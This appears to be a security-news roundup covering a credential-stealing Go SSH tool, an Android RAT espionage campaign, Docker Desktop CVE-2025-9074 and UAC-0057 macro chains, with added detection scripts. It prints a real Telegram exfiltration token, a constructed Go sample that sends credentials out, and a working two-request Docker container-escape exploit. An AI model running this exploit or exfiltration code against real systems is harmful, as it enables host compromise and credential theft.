Microsoft Threat Intelligence has spotlighted the escalating adoption of the ClickFix social engineering technique, a sophisticated method that manipulates users into executing malicious commands on their devices, bypassing traditional automated security defenses. Observed since early 2024, this tactic has targeted thousands of enterprise and end-user systems daily, delivering payloads such as Lumma Stealer infostealers, remote […]
A sophisticated supply chain attack has emerged targeting developers through a malicious Go module package that masquerades as a legitimate SSH brute forcing tool while covertly stealing credentials for cybercriminal operations.
The package, named “golang-random-ip-ssh-bruteforce,” presents itself as a fast SSH brute forcer but contains hidden functionality that exfiltrates successful login credentials to a Telegram bot controlled by threat actors.
The malicious package operates by continuously scanning random IPv4 addresses for exposed SSH services on TCP port 22, attempting authentication using an embedded username-password wordlist, and immediately transmitting any successful credentials to its operators.
What makes this attack particularly insidious is that victims believe they are conducting legitimate penetration testing or security research, while unknowingly feeding their discoveries directly to cybercriminals.
Socket.dev analysts identified the malicious behavior embedded within the seemingly legitimate security tool, revealing that the package has been active since June 24, 2022.
The researchers discovered that upon the first successful SSH login, the package automatically sends the target IP address, username, and password to a hardcoded Telegram bot endpoint controlled by a Russian-speaking threat actor known as “IllDieAnyway” on GitHub.
Telegram Bot and user info (Source – Socket.dev)
The attack vector exploits the trust relationship between developers and open-source packages, representing a growing trend of malicious actors distributing offensive security tools with backdoor functionality.
Users who download and run the package become unwitting participants in a larger credential harvesting operation: every successful login they achieve is reported to the operators instead of staying with the assessment it was meant to serve.
Technical Implementation and Evasion Mechanisms
The implementation is simple rather than sophisticated, but its design keeps the scanning footprint small and the exfiltration channel reliable.
The package includes a deliberately minimal wordlist containing only common default credentials such as “root:toor,” “admin:password,” and IoT-specific combinations like “root:raspberry” and “root:dietpi,” which reduces network noise and speeds up the scanning process while maintaining plausible deniability for its operators.
The core malicious functionality centers around a hardcoded Telegram API endpoint: https://api.telegram.org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage.
When successful authentication occurs, the package executes an HTTP GET request to this endpoint, transmitting the compromised credentials in the format “ip:username:password” to chat ID 1159678884, associated with the Telegram user @io_ping.
The malware configures its SSH client with HostKeyCallback: ssh.InsecureIgnoreHostKey(), which skips host key verification so that connections to arbitrary, never-before-seen hosts succeed. On its own this setting is what any internet-wide SSH scanner would use and is not an indicator of malice; the malicious part is the hardcoded Telegram endpoint that receives every successful login.
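One way to catch this pattern before a tool like this is run is a static audit of the Go source for the combination the write-up describes: a hardcoded Telegram bot URL, an outbound HTTP call, and an ip:user:pass string flowing into it. The following is an added example, not Socket's scanner and not the package's own code; the Go snippets are constructed to mirror the described behaviour, the bot token in them is a placeholder of the right shape (the chat ID is the one named above), and the rule list and severities are assumptions.

```python
"""Static audit of Go source for the credential-exfiltration pattern.

Added example: neither Socket's scanner nor golang-random-ip-ssh-bruteforce.
The Go snippets are constructed; the token is a fake of Telegram's
<bot_id>:<35 chars> shape; rules and severities are assumptions.
"""
import re

# Constructed: the malicious shape (hardcoded bot URL, GET with ip:user:pass).
SAMPLE_GO = r'''
const tgURL = "https://api.telegram.org/bot1234567890:AAF0123456789abcdefghijklmnopqrstuv/sendMessage"
const chatID = "1159678884"

func report(ip, user, pass string) {
    msg := url.QueryEscape(fmt.Sprintf("%s:%s:%s", ip, user, pass))
    http.Get(tgURL + "?chat_id=" + chatID + "&text=" + msg)
}

func tryLogin(ip, user, pass string) bool {
    cfg := &ssh.ClientConfig{
        User:            user,
        Auth:            []ssh.AuthMethod{ssh.Password(pass)},
        HostKeyCallback: ssh.InsecureIgnoreHostKey(),
    }
    c, err := ssh.Dial("tcp", ip+":22", cfg)
    if err != nil {
        return false
    }
    c.Close()
    report(ip, user, pass)
    return true
}
'''

# Constructed: same scanner logic, but results stay on the operator's machine.
CLEAN_GO = r'''
func tryLogin(ip, user, pass string) bool {
    cfg := &ssh.ClientConfig{
        User:            user,
        Auth:            []ssh.AuthMethod{ssh.Password(pass)},
        HostKeyCallback: ssh.InsecureIgnoreHostKey(),
    }
    c, err := ssh.Dial("tcp", ip+":22", cfg)
    if err != nil {
        return false
    }
    c.Close()
    fmt.Printf("%s:%s:%s\n", ip, user, pass)
    return true
}
'''

# (rule, severity, pattern) - severities are an assumption for this demo.
RULES = [
    ("telegram_bot_token", "high",
     re.compile(r"api\.telegram\.org/bot\d{6,12}:[A-Za-z0-9_-]{30,45}")),
    ("hardcoded_chat_id", "medium",
     re.compile(r'chat_id\s*=|chatID\s*=\s*"\d+"')),
    ("outbound_http", "medium",
     re.compile(r"\bhttp\.(Get|Post|PostForm)\(")),
    # Expected in any internet-wide scanner: informational, never alone decisive.
    ("insecure_hostkey", "info",
     re.compile(r"ssh\.InsecureIgnoreHostKey\(\)")),
]
CRED_FORMAT = re.compile(r'Sprintf\("%s:%s:%s"')


def audit_go_source(src):
    """Return findings as dicts {rule, severity, line, evidence}."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for rule, sev, pat in RULES:
            if pat.search(line):
                findings.append({"rule": rule, "severity": sev,
                                 "line": lineno, "evidence": line.strip()})
    hit = {f["rule"] for f in findings}
    # Escalate when an ip:user:pass string is built AND a hardcoded third-party
    # endpoint is called: that combination is the credential-theft signature.
    if {"telegram_bot_token", "outbound_http"} <= hit and CRED_FORMAT.search(src):
        findings.append({"rule": "credential_exfiltration", "severity": "critical",
                         "line": 0, "evidence": "ip:user:pass sent to hardcoded Telegram bot"})
    return findings


def verdict(findings):
    sev = {f["severity"] for f in findings}
    if "critical" in sev:
        return "malicious"
    if sev & {"high", "medium"}:
        return "review"
    return "clean"


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_GO), ("clean", CLEAN_GO)):
        print(name, verdict(audit_go_source(src)))
```

The point of the escalation rule is that none of the individual hits is conclusive: InsecureIgnoreHostKey is expected, outbound HTTP is common, and a Telegram URL alone could be a legitimate notification hook. The verdict only becomes "malicious" when credentials are demonstrably formatted and sent off-host.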
Socket’s AI scanner detected a malicious package golang-random-ip-ssh-bruteforce (Source – Socket.dev)
The Socket AI Scanner's detection also surfaces the embedded wordlist file (wl.txt) inside the package; its credential pairs target IoT devices, single-board computers, and hastily configured Linux systems.
A sophisticated South Asian Advanced Persistent Threat (APT) group has been conducting an extensive espionage campaign targeting military personnel and defense organizations across Sri Lanka, Bangladesh, Pakistan, and Turkey.
The threat actors have deployed a multi-stage attack framework combining targeted phishing operations with novel Android malware to compromise the mobile devices of military-adjacent individuals.
The campaign demonstrates a high level of operational security and technical sophistication, utilizing legitimate cloud services and modified open-source tools to evade detection.
Top level PDF phish and Decoy shown post cred theft (Source – StrikeReady)
The attack chain begins with highly targeted phishing emails containing malicious PDF attachments disguised as official military documents.
One notable sample, titled “Coordination of the Chief of Army Staff’s Visit to China.pdf” (MD5: cf9914eca9f8ae90ddd54875506459d6), exemplifies the group’s social engineering tactics.
These documents redirect victims to credential harvesting pages hosted on Netlify, including mail-mod-gov-bd-account-conf-files.netlify.app and coordination-cas-visit.netlify.app, which closely mimic legitimate government and military email portals.
StrikeReady analysts identified the threat actor’s infrastructure through pivoting on shared code elements and domain registration patterns.
The researchers discovered a network of over 50 malicious domains spoofing various South Asian military and government organizations, including the Bangladesh Air Force, Directorate General of Defence Purchase (DGDP), and Turkish defense contractors such as Roketsan and Aselsan.
The group’s most concerning capability involves the deployment of modified Android Remote Access Trojans (RATs) based on the open-source Rafel RAT framework.
The malware, distributed through APK files such as Love_Chat.apk (MD5: 9a7510e780ef40d63ca5ab826b1e9dab), masquerades as legitimate chat applications while establishing persistent backdoor access to compromised devices.
Analysis of the decompiled application reveals extensive data exfiltration capabilities, with the malware programmed to upload various document types to command-and-control servers.
Android RAT Infrastructure
The Android component represents a significant evolution in the group’s capabilities, demonstrating sophisticated mobile malware development skills.
The threat actors modified the original Rafel RAT source code, removing attribution credits and implementing custom command-and-control communications through domains like quickhelpsolve.com and kutcat-rat.com.
Decoys (Source – StrikeReady)
The malware requests dangerous permissions including ADD_DEVICE_ADMIN, READ_EXTERNAL_STORAGE, MANAGE_APP_ALL_FILES_ACCESS_PERMISSION, and READ_CONTACTS, enabling comprehensive device compromise.
The C2 infrastructure utilizes base64-encoded communication channels, with the primary command endpoint located at https://quickhelpsolve.com/public/commands.php.
This centralized control mechanism allows operators to issue arbitrary commands to compromised devices, collect stolen data, and maintain persistent access to victim networks.
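A practical first triage step for an APK like Love_Chat.apk is to read its manifest and ask whether the permission set matches the app's stated purpose: a chat app has no reason to want device-admin rights plus all-files access. The following is an added example, not StrikeReady's tooling and not Rafel RAT code. Both manifests are constructed; it uses the standard manifest permission names that correspond to the intent-action names listed above (device admin via BIND_DEVICE_ADMIN, all-files access via MANAGE_EXTERNAL_STORAGE), and the weights and thresholds are assumptions.

```python
"""Triage an AndroidManifest.xml for a RAT-style permission set.

Added example; not StrikeReady's tooling, not Rafel RAT. Manifests are
constructed. Weights and thresholds are assumptions for the demo.
"""
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"

# Constructed: a "chat app" asking for device admin, all-files, SMS and contacts.
RAT_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.lovechat">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
  <application android:label="Love Chat">
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed: an ordinary camera app for comparison.
BENIGN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.camera">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="Camera"/>
</manifest>"""

WEIGHTS = {
    "android.permission.MANAGE_EXTERNAL_STORAGE": 3,  # all-files access
    "android.permission.READ_SMS": 2,
    "android.permission.RECEIVE_SMS": 2,
    "android.permission.READ_CONTACTS": 2,
    "android.permission.READ_CALL_LOG": 2,
    "android.permission.RECORD_AUDIO": 2,
    "android.permission.READ_EXTERNAL_STORAGE": 1,
}
DEVICE_ADMIN_WEIGHT = 3


def permissions(root):
    return {e.get(NS + "name") for e in root.iter("uses-permission")}


def has_device_admin(root):
    """True if a receiver is guarded by BIND_DEVICE_ADMIN or handles DEVICE_ADMIN_ENABLED."""
    for r in root.iter("receiver"):
        if r.get(NS + "permission") == "android.permission.BIND_DEVICE_ADMIN":
            return True
        for a in r.iter("action"):
            if a.get(NS + "name") == "android.app.action.DEVICE_ADMIN_ENABLED":
                return True
    return False


def triage(manifest_xml):
    root = ET.fromstring(manifest_xml)
    perms = permissions(root)
    hits = sorted(p for p in perms if p in WEIGHTS)
    admin = has_device_admin(root)
    score = sum(WEIGHTS[p] for p in hits) + (DEVICE_ADMIN_WEIGHT if admin else 0)
    # Device admin plus all-files access is the pairing that lets a RAT resist
    # uninstallation and sweep documents off the device.
    if score >= 8 or (admin and "android.permission.MANAGE_EXTERNAL_STORAGE" in perms):
        verdict = "likely RAT"
    elif score >= 4:
        verdict = "review"
    else:
        verdict = "low"
    return {"package": root.get("package"), "score": score, "hits": hits,
            "device_admin": admin, "verdict": verdict}


if __name__ == "__main__":
    for m in (RAT_MANIFEST, BENIGN_MANIFEST):
        print(triage(m))
```

On a real APK the manifest is binary XML; decode it first (for example with apktool or androguard) and feed the resulting text to triage().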
Security researchers discovered that the threat actors had successfully compromised military personnel across multiple countries, with stolen data including SMS messages, contact lists containing military ranks and duty stations, and sensitive organizational documents.
The Zscaler ThreatLabz team has uncovered significant advancements in the Anatsa malware, also known as TeaBot, an Android banking trojan that has been active since 2020. Originally designed for credential theft, keylogging, and facilitating fraudulent transactions, Anatsa has evolved into a more sophisticated threat, now targeting over 831 financial institutions worldwide. This expansion includes new […]
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical zero-day vulnerability affecting Apple iOS, iPadOS, and macOS systems that is being actively exploited in the wild. CVE-2025-43300, an out-of-bounds write vulnerability in Apple’s Image I/O framework, poses significant security risks to millions of users across Apple’s ecosystem. Critical Vulnerability […]
A newly disclosed vulnerability in Docker Desktop for Windows has revealed how a simple Server-Side Request Forgery (SSRF) attack could lead to complete host system compromise.
CVE-2025-9074, discovered by Felix Boulet and reported on August 21, 2025, affects all Docker Desktop versions prior to 4.44.3 and demonstrates how container isolation can be completely bypassed through unauthenticated API access.
Key Takeaways
1. Containers on Docker Desktop could reach an unauthenticated engine API and fully compromise the host.
2. Two HTTP requests create a privileged container with the host filesystem mounted.
3. Update to Docker Desktop 4.44.3 or later immediately.
The vulnerability was found accidentally during routine network scanning and highlights critical gaps in Docker’s internal security architecture.
Philippe Dugre from Pvotal Technologies independently discovered a similar issue on macOS platforms, emphasizing the cross-platform nature of this security flaw.
The vulnerability stems from Docker Desktop exposing its internal HTTP API endpoint at http://192.168.65.7:2375/ without any authentication mechanisms.
Any container running within the Docker environment could access this endpoint and execute privileged operations against the host system.
This represents a fundamental breakdown of the container isolation model, where workloads should be completely separated from their host environment.
The attack surface was particularly concerning because it required minimal technical sophistication—attackers needed only basic HTTP request capabilities rather than complex exploit chains or memory corruption techniques.
Docker Container Exploitation Process
The exploitation process requires just two HTTP POST requests executed from within any container environment.
The first request targets the /containers/create endpoint with a JSON payload that configures a new privileged container with host filesystem bindings.
The critical configuration parameter is a bind mount of /mnt/host/c (the Docker Desktop VM's view of the Windows C: drive) to a container path such as /host_root, which gives the new container read and write access to the entire host filesystem.
The JSON payload also specifies execution commands that run automatically upon container startup, enabling immediate post-exploitation activities.
The second HTTP request initiates container execution through the /containers/{id}/start endpoint, triggering the malicious container with elevated privileges.
This two-step process bypasses Docker Desktop's isolation controls and gives the attacker access to the host filesystem comparable to that of a local administrator account.
The vulnerability is particularly insidious because it can be exploited through SSRF attacks, meaning attackers don’t require direct code execution within containers—they only need the ability to trigger HTTP requests from compromised web applications or services running in containerized environments.
Risk Factors and Details
Affected Products: Docker Desktop for Windows (versions < 4.44.3); Docker Desktop for macOS (similar issue reported)
Impact: Full host system compromise
Exploit Prerequisites: access to any container environment; ability to make HTTP requests; network connectivity to 192.168.65.7:2375
CVSS 3.1 Score: Not specified
Proof of Concept
The proof of concept demonstrates the vulnerability’s simplicity using standard wget commands executable from any Alpine Linux container.
The exploit creates a privileged container that mounts the host C: drive and executes arbitrary commands:
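The two-request flow above, replayed against a local mock of the Docker Engine API so that it runs offline and records exactly what an unauthenticated daemon would have received. This is an added example, not Felix Boulet's proof of concept, and the mock is not Docker. The request shape (POST /containers/create with Privileged and a /mnt/host/c bind, then POST /containers/{id}/start) follows the description above; the image, the container command, the mock's responses and the refusing-daemon case are assumptions.

```python
"""Two-request Docker Desktop exploitation flow against a local mock API.

Added example: not the researcher's PoC, and the mock is not Docker.
Request shape follows CVE-2025-9074 reporting; image, command and the
mock's behaviour are assumptions.
"""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

DOCKER_DESKTOP_API = "http://192.168.65.7:2375"  # endpoint named in the advisory


def exploit_payload(image="alpine", cmd=("sh", "-c", "id > /host_root/pwned.txt")):
    """Privileged container with the VM's view of the host C: drive bound in."""
    return {
        "Image": image,
        "Cmd": list(cmd),
        "HostConfig": {"Privileged": True, "Binds": ["/mnt/host/c:/host_root"]},
    }


def run_exploit(api_base, timeout=3):
    """Create then start the container. Returns the container id, or None when
    the API is unreachable or rejects the request (what a patched host should do)."""
    create = urllib.request.Request(
        api_base + "/containers/create",
        data=json.dumps(exploit_payload()).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    try:
        with urllib.request.urlopen(create, timeout=timeout) as resp:
            cid = json.load(resp)["Id"]
        start = urllib.request.Request(
            f"{api_base}/containers/{cid}/start", data=b"", method="POST")
        with urllib.request.urlopen(start, timeout=timeout) as resp:
            return cid if resp.status in (204, 304) else None
    except (urllib.error.URLError, OSError, KeyError, ValueError):
        return None


class MockDocker(BaseHTTPRequestHandler):
    """Records what an unauthenticated daemon would have received."""
    received = []   # (path, parsed JSON body or None)
    deny = False    # flip to emulate a daemon that refuses the request

    def do_POST(self):
        n = int(self.headers.get("Content-Length", 0))
        raw = self.rfile.read(n) if n else b""
        MockDocker.received.append((self.path, json.loads(raw) if raw else None))
        if MockDocker.deny:
            self.send_response(403)
            self.end_headers()
        elif self.path == "/containers/create":
            out = json.dumps({"Id": "deadbeef" * 8, "Warnings": []}).encode()
            self.send_response(201)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(out)))
            self.end_headers()
            self.wfile.write(out)
        elif self.path.endswith("/start"):
            self.send_response(204)
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo(deny=False):
    """Run the exploit against the mock; returns (container id or None, recorded requests)."""
    MockDocker.received = []
    MockDocker.deny = deny
    srv = HTTPServer(("127.0.0.1", 0), MockDocker)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        cid = run_exploit(f"http://127.0.0.1:{srv.server_port}")
    finally:
        srv.shutdown()
        srv.server_close()
    return cid, list(MockDocker.received)


if __name__ == "__main__":
    cid, reqs = demo()
    print("exposed daemon:", cid, [path for path, _ in reqs])
    print("refusing daemon:", demo(deny=True)[0])
```

Pointing run_exploit() at DOCKER_DESKTOP_API from inside a container on an unpatched Docker Desktop is the real check; a None result means the endpoint is unreachable or refused, a container id means the host is exposed.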
Docker responded quickly to this disclosure, releasing version 4.44.3 with complete remediation of the vulnerability.
The fix implements proper authentication controls for internal API endpoints and strengthens network segmentation between container workloads and Docker’s control plane.
Security researchers recommend immediate updating to the patched version, as no workarounds exist for affected systems.
A sophisticated cyber espionage campaign has emerged targeting Ukrainian and Polish organizations through weaponized PDF invitation files designed to execute malicious shell scripts.
The campaign, active since April 2025, demonstrates a calculated approach to infiltrating government and private sector networks through carefully crafted social engineering tactics.
The threat actors behind this operation have leveraged seemingly legitimate invitation documents, including meeting invitations and official government communications, to establish initial access to target systems.
These malicious PDF files serve as decoys while simultaneously deploying multi-stage infection chains that culminate in the execution of shell scripts and the deployment of sophisticated implants for persistent access and data collection.
Infection chain for May archive (Source – HarfangLab)
The campaign exhibits notable sophistication in its execution methodology, utilizing compressed archive files containing XLS spreadsheets embedded with VBA macros.
These macros are responsible for dropping and loading Dynamic Link Libraries (DLLs) that collect comprehensive system information and retrieve next-stage malware from command and control servers.
The systematic nature of the attacks suggests a well-resourced threat actor with extensive operational capabilities.
HarfangLab researchers identified striking similarities between this campaign and previously reported activities associated with UAC-0057, also known as UNC1151, FrostyNeighbor, or Ghostwriter.
This cyber espionage group has documented ties to the Belarusian government and has consistently targeted Eastern European nations, particularly Ukraine and Poland, with sophisticated information-gathering operations designed to support state-sponsored intelligence objectives.
The malware’s impact extends beyond simple data theft, as the threat actors have demonstrated the ability to maintain persistent access to compromised systems while avoiding detection through careful operational security practices.
Infection chain for July archives (Source – HarfangLab)
The infection chains reveal a methodical approach to system reconnaissance, with implants designed to collect detailed information about compromised environments before deploying additional payloads for extended exploitation.
Infection Mechanism and Execution Flow
The UAC-0057 infection mechanism represents a carefully orchestrated multi-stage attack that begins with the delivery of malicious archive files through suspected spearphishing campaigns.
The primary infection vector involves compressed archives containing XLS spreadsheets that embed sophisticated VBA macros, which serve as the initial execution point for the malware deployment process.
Infection chain for April archives (Source – HarfangLab)
Once executed, these VBA macros demonstrate varying levels of obfuscation consistent with tools like MacroPack, an offensive security framework available on GitHub.
The execution logic has evolved throughout the campaign, with earlier samples directly dropping DLLs to temporary directories, while more recent variants employ additional layers of complexity including Microsoft Cabinet (CAB) files and Link (LNK) files to obscure the deployment process.
The infection chain progresses through a systematic approach where the VBA macro writes encrypted DLL payloads to specific paths such as %LOCALAPPDATA%\Serv\0x00bac729fe.log or %TEMP%\DefenderProtectionScope.log.
These DLLs are subsequently loaded with Windows' built-in regsvr32.exe, with parameters chosen to execute the malicious code while minimizing system alerts. regsvr32 does not care about the file extension, so a DLL renamed to .log loads normally; the combination of an Office parent process, a user-writable drop directory and a non-DLL extension is the detection opportunity.
The first-stage implants, written in C# and obfuscated using ConfuserEx, establish persistence through Windows Registry modifications and scheduled tasks.
These implants collect comprehensive system intelligence including operating system details, hostname information, CPU specifications, and installed antivirus products before transmitting this data to command and control infrastructure designed to blend with legitimate web traffic.
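The regsvr32 loading step is the most detectable point in this chain, because a legitimate COM registration rarely comes from an Office parent, from a user-writable directory, and with a non-DLL extension all at once. The following detection logic is an added example, not HarfangLab's detection content; it runs over constructed process-creation events that follow the common Image / ParentImage / CommandLine field convention. The user name, the /s switch and the benign events are assumptions; the two drop paths are the ones named above with %LOCALAPPDATA% and %TEMP% expanded.

```python
"""Flag regsvr32 loads that look like the UAC-0057 DLL-drop step.

Added example, not HarfangLab's rules. Events are constructed; the user
name, the /s switch and the benign events are assumptions.
"""
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
DLL_EXTENSIONS = {".dll", ".ocx", ".ax"}
USER_WRITABLE = re.compile(r"\\AppData\\(Local|Roaming)\\|\\Temp\\|\\Users\\Public\\", re.I)
EXT = re.compile(r"\.[^.\\/]+$")

# Constructed events. The first two mirror the write-up's drop paths.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Serv\0x00bac729fe.log"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'regsvr32.exe "C:\Users\alice\AppData\Local\Temp\DefenderProtectionScope.log"'},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorlib.dll"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\AppData\Local\Temp\notes.log"},
]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def module_argument(cmdline):
    """Last non-switch argument of a regsvr32 command line, quotes stripped."""
    tokens = [quoted or bare for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    args = [t for t in tokens[1:] if not t.startswith(("/", "-"))]
    return args[-1] if args else None


def analyze(event):
    """None for non-regsvr32 events; otherwise the module, reasons and an alert flag."""
    if basename(event["Image"]) != "regsvr32.exe":
        return None
    module = module_argument(event["CommandLine"])
    reasons = []
    if module:
        m = EXT.search(module)
        ext = m.group(0).lower() if m else ""
        if ext not in DLL_EXTENSIONS:
            reasons.append(f"module extension {ext or '(none)'} is not a DLL extension")
        if USER_WRITABLE.search(module):
            reasons.append("module is in a user-writable directory")
    parent = basename(event["ParentImage"])
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office process {parent}")
    # Any two of the three together is a strong signal; one alone is noisy.
    return {"module": module, "reasons": reasons, "alert": len(reasons) >= 2}


def scan(events):
    """Return the analyses that crossed the alert threshold, in input order."""
    return [r for r in (analyze(ev) for ev in events) if r and r["alert"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["module"], "->", "; ".join(r["reasons"]))
```

The two-of-three threshold is deliberate: regsvr32 from an installer against Program Files is routine, and a lone .log extension could be a packaging quirk, but an Office parent plus a drop in AppData is what the macro-to-DLL handoff described above looks like in telemetry.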
Figure 1 shows the complete infection chain for the May archive variant, illustrating the sophisticated multi-layered approach employed by UAC-0057 to achieve system compromise while maintaining operational security throughout the deployment process.
Microsoft has announced significant restrictions on the use of default onmicrosoft.com domains for email communication, implementing new throttling measures to combat spam and improve email deliverability across its Microsoft 365 platform. Policy Changes Target Spam Prevention The technology giant will introduce throttling limits that restrict messages sent from onmicrosoft.com domains to just 100 external recipients […]
Cybersecurity researchers have developed an artificial intelligence system capable of automatically generating working exploits for published Common Vulnerabilities and Exposures (CVEs) in just 10-15 minutes at approximately $1 per exploit, fundamentally challenging the traditional security response timeline that defenders rely upon. The breakthrough system employs a sophisticated multi-stage pipeline that analyzes CVE advisories and code […]
Socket’s Threat Research Team has uncovered a deceptive Go module named golang-random-ip-ssh-bruteforce, which masquerades as an efficient SSH brute-forcing tool but secretly exfiltrates stolen credentials to its creator. Published on June 24, 2022, this package remains active on the Go Module ecosystem and GitHub, despite efforts to petition for its removal and the suspension of […]